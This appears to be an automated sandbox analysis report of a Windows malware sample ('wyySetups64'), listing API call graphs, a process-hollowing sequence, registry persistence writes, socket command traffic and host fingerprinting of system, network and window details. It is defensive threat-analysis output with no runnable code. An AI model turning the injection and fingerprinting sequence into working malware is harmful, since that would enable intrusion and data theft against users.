bd1280 DeleteCriticalSection RaiseException __CxxThrowException@8 43487->43553 43492 bd5b7a 43488->43492 43493 bd5b84 CreateEventW 43488->43493 43554 bd1280 DeleteCriticalSection RaiseException __CxxThrowException@8 43489->43554 43555 bd1280 DeleteCriticalSection RaiseException __CxxThrowException@8 43492->43555 43495 bd5b9f 43493->43495 43496 bd5ba9 InitializeCriticalSectionAndSpinCount 43493->43496 43556 bd1280 DeleteCriticalSection RaiseException __CxxThrowException@8 43495->43556 43498 bd5c6d 43496->43498 43499 bd5c77 InitializeCriticalSectionAndSpinCount 43496->43499 43557 bd1280 DeleteCriticalSection RaiseException __CxxThrowException@8 43498->43557 43501 bd5c8e 43499->43501 43502 bd5c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 43499->43502 43558 bd1280 DeleteCriticalSection RaiseException __CxxThrowException@8 43501->43558 43559 bd67ff 43502->43559 43506 bd67ff 77 API calls 43507 bd5d3b 43506->43507 43509 bd681d 43508->43509 43510 bd681f IsDebuggerPresent 43508->43510 43509->43467 43516 bdb5e6 43510->43516 43513 bd794f SetUnhandledExceptionFilter UnhandledExceptionFilter 43514 bd796c __call_reportfault 43513->43514 43515 bd7974 GetCurrentProcess TerminateProcess 43513->43515 43514->43515 43515->43467 43516->43513 43518 bd6f00 43517->43518 43526 bd6e91 43517->43526 43544 bd8550 DecodePointer 43518->43544 43520 bd6f06 43545 bd710d 66 API calls __getptd_noexit 43520->43545 43523 bd6ebf RtlAllocateHeap 43523->43526 43533 bd6ef8 43523->43533 43525 bd6eec 43542 bd710d 66 API calls __getptd_noexit 43525->43542 43526->43523 43526->43525 43530 bd6e9c 43526->43530 43531 bd6eea 43526->43531 43541 bd8550 DecodePointer 43526->43541 43530->43526 43538 bd8508 66 API calls 2 library calls 43530->43538 43539 bd8359 66 API calls 7 library calls 43530->43539 43540 bd8098 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 43530->43540 43543 bd710d 66 API calls __getptd_noexit 43531->43543 43533->43471 43534->43471 43535->43478 43536->43475 43537->43479 43538->43530 43539->43530 43541->43526 43542->43531 43543->43533 43544->43520 43545->43533 43547 bd6437 43546->43547 43548 bd6441 43546->43548 43571 bd1280 DeleteCriticalSection RaiseException __CxxThrowException@8 43547->43571 43550 bd5af2 InitializeCriticalSectionAndSpinCount 43548->43550 43572 bd6e49 66 API calls _free 43548->43572 43550->43486 43550->43487 43552->43482 43553->43486 43554->43488 43555->43493 43556->43496 43557->43499 43558->43502 43561 bd6f17 43559->43561 43560 bd6e83 _malloc 66 API calls 43560->43561 43561->43560 43562 bd5d2b 43561->43562 43567 bd6f3d std::exception::exception 43561->43567 43573 bd8550 DecodePointer 43561->43573 43562->43506 43564 bd6f7b 43575 bd6e24 66 API calls std::exception::operator= 43564->43575 43566 bd6f85 43576 bd7836 RaiseException 43566->43576 43567->43564 43574 bd73e9 76 API calls __cinit 43567->43574 43570 bd6f96 43571->43548 43572->43550 43573->43561 43574->43564 43575->43566 43576->43570 43577 bd474c lstrlenW 43578 befff8 43577->43578 43579 bef63d send 43580 bd638b 43583 bd1100 43580->43583 43582 bd6390 43584 bd110b 43583->43584 43585 bd1111 43583->43585 43584->43582 43591 bd6ba0 43585->43591 43587 bd1134 VirtualAlloc 43588 bd116f 43587->43588 43589 bd1198 43588->43589 43590 bd118a VirtualFree 43588->43590 43589->43582 43590->43589 43592 bd6bad 43591->43592 43595 bd7d77 __ctrlfp __floor_pentium4 43591->43595 43593 bd6bde 43592->43593 43592->43595 43600 bd6c28 43593->43600 43602 bd7a9b 67 API calls _free 43593->43602 43594 bd7de5 __floor_pentium4 43599 bd7dd2 __ctrlfp 43594->43599 43604 bdbc80 67 API calls 6 library calls 43594->43604 43595->43594 43598 bd7dc2 43595->43598 43595->43599 43603 bdbc2b 66 API calls 3 library calls 43598->43603 43599->43587 43600->43587 43602->43600 43603->43599 43604->43599 43605 bef927 43606 befb9a 43605->43606 43611 bd60df 43606->43611 43615 bef997 43606->43615 43619 bd5ef8 43606->43619 43612 bd60e5 43611->43612 43623 bd11b0 43612->43623 43614 befab1 GetCurrentThreadId 43616 bd5f68 43615->43616 43617 bd1100 70 API calls 43616->43617 43618 bef9b7 43616->43618 43617->43616 43620 bd5f68 43619->43620 43621 bd1100 70 API calls 43620->43621 43622 bef9b7 43620->43622 43621->43620 43624 bd11bd 43623->43624 43625 bd11c6 43624->43625 43626 bd6ba0 __floor_pentium4 68 API calls 43624->43626 43625->43614 43627 bd11ee 43626->43627 43628 bd121b VirtualAlloc 43627->43628 43629 bd1214 43627->43629 43630 bd1236 43628->43630 43629->43614 43631 bd1247 VirtualFree 43630->43631 43631->43614 43632 bd4274 43633 bef814 CreateThread 43632->43633 43635 bd6110 43633->43635 43636 bf00d5 43635->43636 43637 bd2d80 ResetEvent InterlockedExchange timeGetTime socket 43638 bd2dfc lstrlenW WideCharToMultiByte 43637->43638 43639 bd2de8 43637->43639 43641 bd67ff 77 API calls 43638->43641 43640 bd6815 setSBUpLow 5 API calls 43639->43640 43642 bd2df6 43640->43642 43643 bd2e22 lstrlenW WideCharToMultiByte gethostbyname 43641->43643 43644 bd2e59 ctype 43643->43644 43645 bd2e96 43644->43645 43646 bd2e60 htons connect 43644->43646 43648 bd6815 setSBUpLow 5 API calls 43645->43648 43646->43645 43647 bd2eab setsockopt setsockopt setsockopt setsockopt 43646->43647 43650 bd2f24 WSAIoctl 43647->43650 43651 bd2f52 InterlockedExchange 43647->43651 43649 bd2ea5 43648->43649 43650->43651 43658 bd721b 43651->43658 43654 bd721b 750 API calls 43655 bd2f91 43654->43655 43656 bd6815 setSBUpLow 5 API calls 43655->43656 43657 bd2fa6 43656->43657 43659 bd723f 43658->43659 43660 bd722b 43658->43660 43662 bd9754 ___set_flsgetvalue 3 API calls 43659->43662 43684 bd710d 66 API calls __getptd_noexit 43660->43684 43664 bd7245 43662->43664 43663 bd7230 43685 bd8702 11 API calls __lseeki64 43663->43685 43666 bd9fe4 __calloc_crt 66 API calls 43664->43666 43667 bd7251 43666->43667 43668 bd72a2 43667->43668 43679 bd990f 43667->43679 43686 bd6e49 66 API calls _free 43668->43686 43672 bd72a8 43674 bd2f79 43672->43674 43687 bd7133 66 API calls 2 library calls 43672->43687 43673 bd97e2 __CRT_INIT@12 66 API calls 43675 bd7267 CreateThread 43673->43675 43674->43654 43675->43674 43678 bd729a GetLastError 43675->43678 43704 bd71b6 43675->43704 43678->43668 43688 bd9896 GetLastError 43679->43688 43681 bd9917 43682 bd725e 43681->43682 43702 bd8315 66 API calls 3 library calls 43681->43702 43682->43673 43684->43663 43685->43674 43686->43672 43687->43674 43689 bd9754 ___set_flsgetvalue 3 API calls 43688->43689 43690 bd98ad 43689->43690 43691 bd9903 SetLastError 43690->43691 43692 bd9fe4 __calloc_crt 62 API calls 43690->43692 43691->43681 43693 bd98c1 43692->43693 43693->43691 43694 bd98c9 DecodePointer 43693->43694 43695 bd98de 43694->43695 43696 bd98fa 43695->43696 43697 bd98e2 43695->43697 43703 bd6e49 66 API calls _free 43696->43703 43698 bd97e2 __CRT_INIT@12 62 API calls 43697->43698 43700 bd98ea GetCurrentThreadId 43698->43700 43700->43691 43701 bd9900 43701->43691 43703->43701 43705 bd9754 ___set_flsgetvalue 3 API calls 43704->43705 43706 bd71c1 43705->43706 43719 bd9734 TlsGetValue 43706->43719 43709 bd71fa 43721 bd9929 43709->43721 43710 bd71d0 43770 bd9788 DecodePointer 43710->43770 43712 bd7215 43757 bd7175 43712->43757 43716 bd71df 43717 bd71f0 GetCurrentThreadId 43716->43717 43718 bd71e3 GetLastError ExitThread 43716->43718 43717->43712 43720 bd71cc 43719->43720 43720->43709 43720->43710 43724 bd9935 __lseeki64 43721->43724 43722 bd9a37 __lseeki64 43722->43712 43723 bd994d 43726 bd995b 43723->43726 43772 bd6e49 66 API calls _free 43723->43772 43724->43722 43724->43723 43771 bd6e49 66 API calls _free 43724->43771 43728 bd9969 43726->43728 43773 bd6e49 66 API calls _free 43726->43773 43730 bd9977 43728->43730 43774 bd6e49 66 API calls _free 43728->43774 43731 bd9985 43730->43731 43775 bd6e49 66 API calls _free 43730->43775 43734 bd9993 43731->43734 43776 bd6e49 66 API calls _free 43731->43776 43736 bd99a1 43734->43736 43777 bd6e49 66 API calls _free 43734->43777 43738 bd99b2 43736->43738 43778 bd6e49 66 API calls _free 43736->43778 43739 bdc144 __lock 66 API calls 43738->43739 43741 bd99ba 43739->43741 43742 bd99c6 InterlockedDecrement 43741->43742 43743 bd99df 43741->43743 43742->43743 43744 bd99d1 43742->43744 43780 bd9a43 LeaveCriticalSection _doexit 43743->43780 43744->43743 43779 bd6e49 66 API calls _free 43744->43779 43746 bd99ec 43748 bdc144 __lock 66 API calls 43746->43748 43749 bd99f3 43748->43749 43756 bd9a24 43749->43756 43781 bddf0e 8 API calls 43749->43781 43752 bd9a31 43784 bd6e49 66 API calls _free 43752->43784 43754 bd9a08 43754->43756 43782 bddfa7 66 API calls 4 library calls 43754->43782 43783 bd9a4f LeaveCriticalSection _doexit 43756->43783 43758 bd7181 __lseeki64 43757->43758 43759 bd990f __getptd 66 API calls 43758->43759 43760 bd7186 43759->43760 43785 bd52b0 43760->43785 43796 bd30c0 43760->43796 43801 bd2fb0 43760->43801 43811 bd52d9 43760->43811 43761 bd7190 43822 bd7156 43761->43822 43763 bd7196 43764 bd9c41 __XcptFilter 66 API calls 43763->43764 43765 bd71a7 43764->43765 43770->43716 43771->43723 43772->43726 43773->43728 43774->43730 43775->43731 43776->43734 43777->43736 43778->43738 43779->43743 43780->43746 43781->43754 43782->43756 43783->43752 43784->43722 43786 bd536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 43785->43786 43791 bd52cc 43785->43791 43787 bd543c 43786->43787 43788 bd53ca 43786->43788 43850 31f0497 43787->43850 43792 bd5403 OpenProcess 43788->43792 43794 bd542f Sleep 43788->43794 43828 bd5820 43788->43828 43791->43786 43792->43788 43793 bd5415 GetExitCodeProcess 43792->43793 43793->43788 43794->43792 43797 bd3128 43796->43797 43800 bd30d4 43796->43800 43797->43761 43798 bd30e8 Sleep 43798->43800 43799 bd3104 timeGetTime 43799->43800 43800->43797 43800->43798 43800->43799 43802 bd67ff 77 API calls 43801->43802 43803 bd2fd3 43802->43803 43804 bd306d 43803->43804 43805 bd3014 select 43803->43805 43807 bd3032 recv 43803->43807 43810 bd710d 66 API calls _free 43803->43810 44030 bd3350 43803->44030 43806 bd6815 setSBUpLow 5 API calls 43804->43806 43805->43803 43805->43804 43808 bd3098 43806->43808 43807->43803 43808->43761 43810->43803 43815 bd52d2 43811->43815 43812 bd536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 43813 bd543c 43812->43813 43814 bd53ca 43812->43814 43821 31f0497 578 API calls 43813->43821 43816 bd5820 105 API calls 43814->43816 43818 bd5403 OpenProcess 43814->43818 43820 bd542f Sleep 43814->43820 43815->43812 43816->43814 43817 bd5442 43817->43761 43818->43814 43819 bd5415 GetExitCodeProcess 43818->43819 43819->43814 43820->43818 43821->43817 43823 bd9896 __getptd_noexit 66 API calls 43822->43823 43824 bd7160 43823->43824 43825 bd716b ExitThread 43824->43825 44077 bd9a58 79 API calls __freefls@4 43824->44077 43827 bd716a 43827->43825 43829 bd584e _memset 43828->43829 43830 bd58a2 GetSystemDirectoryA 43829->43830 43855 bd59e0 97 API calls _vswprintf_s 43830->43855 43832 bd58d6 GetFileAttributesA 43833 bd590b CreateProcessA 43832->43833 43834 bd58eb 43832->43834 43836 bd5940 VirtualAllocEx 43833->43836 43837 bd5932 43833->43837 43856 bd59e0 97 API calls _vswprintf_s 43834->43856 43840 bd59ac 43836->43840 43841 bd595a WriteProcessMemory 43836->43841 43839 bd6815 setSBUpLow 5 API calls 43837->43839 43838 bd5908 43838->43833 43843 bd593c 43839->43843 43842 bd6815 setSBUpLow 5 API calls 43840->43842 43841->43840 43844 bd5972 GetThreadContext 43841->43844 43845 bd59b9 43842->43845 43843->43788 43844->43840 43846 bd5991 SetThreadContext 43844->43846 43845->43788 43846->43840 43847 bd59bd ResumeThread 43846->43847 43848 bd6815 setSBUpLow 5 API calls 43847->43848 43849 bd59d7 43848->43849 43849->43788 43857 31f00cd GetPEB 43850->43857 43853 bd5442 43853->43761 43854 31f04a8 43854->43853 43859 31f01cb 43854->43859 43855->43832 43856->43838 43858 31f00e5 43857->43858 43858->43854 43860 31f01e6 43859->43860 43865 31f01df 43859->43865 43861 31f021e VirtualAlloc 43860->43861 43860->43865 43864 31f0238 43861->43864 43861->43865 43862 31f0330 LoadLibraryA 43862->43864 43862->43865 43863 31f03a3 43863->43865 43867 33811f2 43863->43867 43864->43862 43864->43863 43865->43853 43868 33811fd 43867->43868 43869 3381202 43867->43869 43885 3388262 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 43868->43885 43873 33810fc 43869->43873 43872 3381210 43872->43865 43874 3381108 ___BuildCatchObjectHelper 43873->43874 43879 3381155 43874->43879 43883 33811a5 ___BuildCatchObjectHelper 43874->43883 43886 3380f98 43874->43886 43878 3381185 43881 3380f98 __CRT_INIT@12 149 API calls 43878->43881 43878->43883 43879->43883 43938 337e480 43879->43938 43880 337e480 ___DllMainCRTStartup 521 API calls 43882 338117c 43880->43882 43881->43883 43884 3380f98 __CRT_INIT@12 149 API calls 43882->43884 43883->43872 43884->43878 43885->43869 43887 3380fa4 ___BuildCatchObjectHelper 43886->43887 43888 3380fac 43887->43888 43889 3381026 43887->43889 43942 3381a1b HeapCreate 43888->43942 43891 3381087 43889->43891 43897 338102c 43889->43897 43892 338108c 43891->43892 43898 33810e5 43891->43898 43957 3383ca0 TlsGetValue 43892->43957 43893 3380fb1 43895 3380fbc 43893->43895 43904 3380fb5 ___BuildCatchObjectHelper 43893->43904 43943 3384014 86 API calls 4 library calls 43895->43943 43896 338104a 43903 338105e 43896->43903 43953 3387dfb 67 API calls _free 43896->43953 43897->43896 43897->43904 43952 3381ce6 66 API calls _doexit 43897->43952 43898->43904 43985 3383fa6 79 API calls __freefls@4 43898->43985 43956 3381071 70 API calls __mtterm 43903->43956 43904->43879 43906 3380fc1 __RTC_Initialize 43910 3380fc5 43906->43910 43917 3380fd1 GetCommandLineA 43906->43917 43944 3381a39 HeapDestroy 43910->43944 43911 3381054 43954 3383cf1 70 API calls _free 43911->43954 43912 33810a9 DecodePointer 43918 33810be 43912->43918 43915 3380fca 43915->43904 43916 3381059 43955 3381a39 HeapDestroy 43916->43955 43945 338817f 71 API calls 2 library calls 43917->43945 43921 33810d9 43918->43921 43922 33810c2 43918->43922 43979 337f639 43921->43979 43966 3383d2e 43922->43966 43923 3380fe1 43946 3387bb6 73 API calls __calloc_crt 43923->43946 43927 33810c9 GetCurrentThreadId 43927->43904 43928 3380feb 43929 3380fef 43928->43929 43948 33880c4 95 API calls 3 library calls 43928->43948 43947 3383cf1 70 API calls _free 43929->43947 43932 3380ffb 43933 338100f 43932->43933 43949 3387e4e 94 API calls 6 library calls 43932->43949 43933->43915 43951 3387dfb 67 API calls _free 43933->43951 43936 3381004 43936->43933 43950 3381af9 77 API calls 4 library calls 43936->43950 43939 337e4af 43938->43939 43940 337e489 43938->43940 43939->43878 43939->43880 43940->43939 43941 337e491 CreateThread WaitForSingleObject 43940->43941 43941->43939 43986 337df10 43941->43986 43942->43893 43943->43906 43944->43915 43945->43923 43946->43928 43947->43910 43948->43932 43949->43936 43950->43933 43951->43929 43952->43896 43953->43911 43954->43916 43955->43903 43956->43904 43958 3381091 43957->43958 43959 3383cb5 DecodePointer TlsSetValue 43957->43959 43960 3384534 43958->43960 43959->43958 43963 338453d 43960->43963 43961 338a6f2 __calloc_crt 65 API calls 43961->43963 43962 338109d 43962->43904 43962->43912 43963->43961 43963->43962 43964 338455b Sleep 43963->43964 43965 3384570 43964->43965 43965->43962 43965->43963 43967 3384300 ___BuildCatchObjectHelper 43966->43967 43968 3383d3a GetModuleHandleW 43967->43968 43969 3388e5b __lock 64 API calls 43968->43969 43970 3383d78 InterlockedIncrement 43969->43970 43971 3383dd0 __CRT_INIT@12 LeaveCriticalSection 43970->43971 43972 3383d92 43971->43972 43973 3388e5b __lock 64 API calls 43972->43973 43974 3383d99 43973->43974 43975 3384d46 ___addlocaleref 8 API calls 43974->43975 43976 3383db7 43975->43976 43977 3383dd9 __CRT_INIT@12 LeaveCriticalSection 43976->43977 43978 3383dc4 ___BuildCatchObjectHelper 43977->43978 43978->43927 43980 337f644 RtlFreeHeap 43979->43980 43981 337f66d __dosmaperr 43979->43981 43980->43981 43982 337f659 43980->43982 43981->43904 43983 337f91b _write_string 64 API calls 43982->43983 43984 337f65f GetLastError 43983->43984 43984->43981 43985->43904 43987 3380542 67 API calls 43986->43987 43988 337df5a Sleep 43987->43988 43989 337df97 43988->43989 43990 337df74 43988->43990 43992 337dfa4 GetLocalTime wsprintfW SetUnhandledExceptionFilter 43989->43992 43993 337df9f 43989->43993 43991 337f707 77 API calls 43990->43991 43994 337df7b 43991->43994 43996 337fa29 284 API calls 43992->43996 43995 3377620 14 API calls 43993->43995 43997 337fa29 284 API calls 43994->43997 43995->43992 43998 337e003 CloseHandle 43996->43998 43999 337df8d CloseHandle 43997->43999 44000 337f707 77 API calls 43998->44000 43999->43989 44001 337e014 44000->44001 44002 337e022 44001->44002 44003 3372c90 8 API calls 44001->44003 44004 337f707 77 API calls 44002->44004 44003->44002 44005 337e036 44004->44005 44006 3379730 80 API calls 44005->44006 44010 337e04e 44005->44010 44006->44010 44007 337f876 66 API calls __NMSG_WRITE 44007->44010 44008 337e189 EnumWindows 44009 337e1a5 Sleep EnumWindows 44008->44009 44008->44010 44009->44009 44009->44010 44010->44007 44010->44008 44011 337e1f0 Sleep 44010->44011 44012 3380542 67 API calls 44010->44012 44013 337e239 CreateEventA 44010->44013 44029 3372da0 301 API calls 44010->44029 44011->44010 44012->44010 44014 337f876 __NMSG_WRITE 66 API calls 44013->44014 44019 337e281 44014->44019 44015 337ca70 113 API calls 44015->44019 44016 337e2bf Sleep RegOpenKeyExW 44017 337e2f5 RegQueryValueExW 44016->44017 44016->44019 44017->44019 44018 3375430 268 API calls 44018->44019 44019->44015 44019->44016 44019->44018 44023 337e339 44019->44023 44020 337e345 CloseHandle 44020->44010 44021 337fa29 284 API calls 44021->44023 44022 337e39f Sleep 44022->44023 44023->44020 44023->44021 44023->44022 44024 337e422 WaitForSingleObject CloseHandle 44023->44024 44025 3380542 67 API calls 44023->44025 44027 337e3dd Sleep CloseHandle 44023->44027 44028 337e3cd WaitForSingleObject CloseHandle 44023->44028 44024->44023 44026 337e43c Sleep CloseHandle 44025->44026 44026->44010 44027->44010 44028->44027 44029->44010 44031 bd3366 44030->44031 44032 bd1100 70 API calls 44031->44032 44037 bd3378 _memmove 44032->44037 44033 bd34e1 44033->43803 44034 bd34c6 44035 bd11b0 70 API calls 44034->44035 44036 bd34d8 44035->44036 44036->43803 44037->44033 44037->44034 44038 bd3403 timeGetTime 44037->44038 44040 bd11b0 70 API calls 44037->44040 44042 bd54c0 44037->44042 44039 bd11b0 70 API calls 44038->44039 44039->44037 44040->44037 44043 bd54dc 44042->44043 44044 bd580d 44042->44044 44045 bd5707 VirtualAlloc 44043->44045 44046 bd54e7 RegOpenKeyExW 44043->44046 44044->44037 44048 bd5745 44045->44048 44047 bd5515 RegQueryValueExW 44046->44047 44053 bd55ba 44046->44053 44049 bd55ad RegCloseKey 44047->44049 44050 bd553a 44047->44050 44052 bd67ff 77 API calls 44048->44052 44049->44053 44051 bd67ff 77 API calls 44050->44051 44054 bd5540 _memset 44051->44054 44055 bd5758 44052->44055 44056 bd55f5 44053->44056 44068 bd56f8 44053->44068 44059 bd554d RegQueryValueExW 44054->44059 44063 bd5788 RegCreateKeyW 44055->44063 44055->44068 44057 bd55fe VirtualFree 44056->44057 44058 bd5611 _memset 44056->44058 44057->44058 44069 bd67ff 77 API calls 44058->44069 44061 bd5569 VirtualAlloc 44059->44061 44062 bd55aa 44059->44062 44060 bd721b 738 API calls 44066 bd57f3 Sleep 44060->44066 44067 bd55a5 44061->44067 44062->44049 44064 bd57ca RegCloseKey 44063->44064 44065 bd57a3 RegDeleteValueW RegSetValueExW 44063->44065 44064->44068 44065->44064 44074 bd2d10 44066->44074 44067->44062 44068->44060 44071 bd56b1 44069->44071 44070 bd56e6 ctype 44070->44037 44071->44070 44072 bd60df 71 API calls 44071->44072 44072->44070 44075 bd2d21 setsockopt CancelIo InterlockedExchange closesocket SetEvent 44074->44075 44076 bd2d70 44074->44076 44075->44076 44076->44044 44077->43827 44078 bd32e0 6 API calls 44079 bd3200 Sleep 44080 bf0254 44079->44080 44081 bd6013 44082 bd6045 44081->44082 44083 bf0003 44082->44083 44086 bd608a 44082->44086 44089 bd5e07 44082->44089 44087 bd60a0 RegOpenKeyExW 44086->44087 44088 bd3f35 __wcsrev 44087->44088 44090 bef0f9 RegQueryValueExW 44089->44090 44091 bd3f35 __wcsrev 44090->44091 44092 bd5eb2 Sleep 44093 bd6f17 77 API calls 44092->44093 44094 bd5ec9 44093->44094

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 03375430 Relevance: 93.2, APIs: 40, Strings: 13, Instructions: 440stringnetworklibraryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 3375430-33754b7 call 337f707 call 3386770 * 3 gethostname gethostbyname 9 33754bd-3375504 inet_ntoa call 33803cf * 2 0->9 10 337555c-337569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 3377490 GetSystemInfo wsprintfW call 3376c50 call 3376ee0 GetForegroundWindow 0->10 9->10 19 3375506-3375508 9->19 24 33756b2-33756c0 10->24 25 337569f-33756ac GetWindowTextW 10->25 21 3375510-337555a inet_ntoa call 33803cf * 2 19->21 21->10 26 33756c2 24->26 27 33756cc-33756f0 lstrlenW call 3376d70 24->27 25->24 26->27 33 3375702-3375726 call 337f876 27->33 34 33756f2-33756ff call 337f876 27->34 39 3375732-3375756 lstrlenW call 3376d70 33->39 40 3375728 33->40 34->33 43 3375768-33757b9 GetModuleHandleW GetProcAddress 39->43 44 3375758-3375765 call 337f876 39->44 40->39 46 33757c6-33757cd GetSystemInfo 43->46 47 33757bb-33757c4 GetNativeSystemInfo 43->47 44->43 49 33757d3-33757e1 46->49 47->49 50 33757e3-33757eb 49->50 51 33757ed-33757f2 49->51 50->51 52 33757f4 50->52 53 33757f9-3375820 wsprintfW call 3376a70 GetCurrentProcessId 51->53 52->53 56 3375885-337588c call 3376690 53->56 57 3375822-337583c OpenProcess 53->57 64 337589e-33758ab 56->64 65 337588e-337589c 56->65 57->56 59 337583e-3375853 K32GetProcessImageFileNameW 57->59 61 3375855-337585c 59->61 62 337585e-3375866 call 33780f0 59->62 66 337587f CloseHandle 61->66 67 337586b-337586d 62->67 68 33758ac-33759a1 call 337f876 call 3376490 call 3376150 call 337fc0e GetTickCount call 338043c call 33803a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 64->68 65->68 66->56 69 337586f-3375876 67->69 70 3375878-337587e 67->70 83 33759a3-33759c8 68->83 84 33759ca-33759e9 68->84 69->66 70->66 85 33759ea-3375a14 call 3375a30 call 3373160 call 337efff 83->85 84->85 90 3375a19-3375a2e call 337f00a 85->90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337546C
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03375485
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03375495
                                                                                                                                                                                                              • gethostname.WS2_32(?,00000032), ref: 033754A3
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 033754AD
                                                                                                                                                                                                              • inet_ntoa.WS2_32 ref: 033754C5
                                                                                                                                                                                                              • _strcat_s.LIBCMT ref: 033754D8
                                                                                                                                                                                                              • _strcat_s.LIBCMT ref: 033754F1
                                                                                                                                                                                                              • inet_ntoa.WS2_32 ref: 0337551A
                                                                                                                                                                                                              • _strcat_s.LIBCMT ref: 0337552D
                                                                                                                                                                                                              • _strcat_s.LIBCMT ref: 03375546
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03375573
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03375587
                                                                                                                                                                                                              • GetLastInputInfo.USER32(?), ref: 0337559A
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 033755A0
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 033755D5
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 033755E8
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 033755FC
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03375653
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337566C
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 03375695
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 033756AC
                                                                                                                                                                                                              • lstrlenW.KERNEL32(000008CC), ref: 033756D3
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000994), ref: 03375739
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 033757AA
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 033757B1
                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 033757C2
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 033757CD
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03375806
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 03375818
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0337582E
                                                                                                                                                                                                              • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0337584B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(03395164), ref: 0337587F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 033758E9
                                                                                                                                                                                                              • __time64.LIBCMT ref: 033758F8
                                                                                                                                                                                                              • __localtime64.LIBCMT ref: 0337592F
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03375968
                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0337597D
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0337598C
                                                                                                                                                                                                              • GetCurrentHwProfileW.ADVAPI32(?), ref: 03375999
                                                                                                                                                                                                                • Part of subcall function 033780F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03378132
                                                                                                                                                                                                                • Part of subcall function 033780F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03378166
                                                                                                                                                                                                                • Part of subcall function 033780F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03378176
                                                                                                                                                                                                                • Part of subcall function 033780F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 033781A6
                                                                                                                                                                                                                • Part of subcall function 033780F0: lstrlenW.KERNEL32(?), ref: 033781B7
                                                                                                                                                                                                                • Part of subcall function 033780F0: __wcsnicmp.LIBCMT ref: 033781CE
                                                                                                                                                                                                                • Part of subcall function 033780F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03378204
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                                                                                                                                              • String ID: %d min$1.0$2024.12. 3$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                                                                                                                                              • API String ID: 1101047656-1568689114
                                                                                                                                                                                                              • Opcode ID: 58bfef68568d3012b3260b1294384520b1c2f37e666334f46871c32e84b41821
                                                                                                                                                                                                              • Instruction ID: 5bb7caa5086bd55218f01843c80941733534148c266c6f2a8e4a8f008eb964a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58bfef68568d3012b3260b1294384520b1c2f37e666334f46871c32e84b41821
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F1C3B5A40708EFEB24EB64CCC5FDB73BCAB48700F004559E61AEB281EA74A645CF55
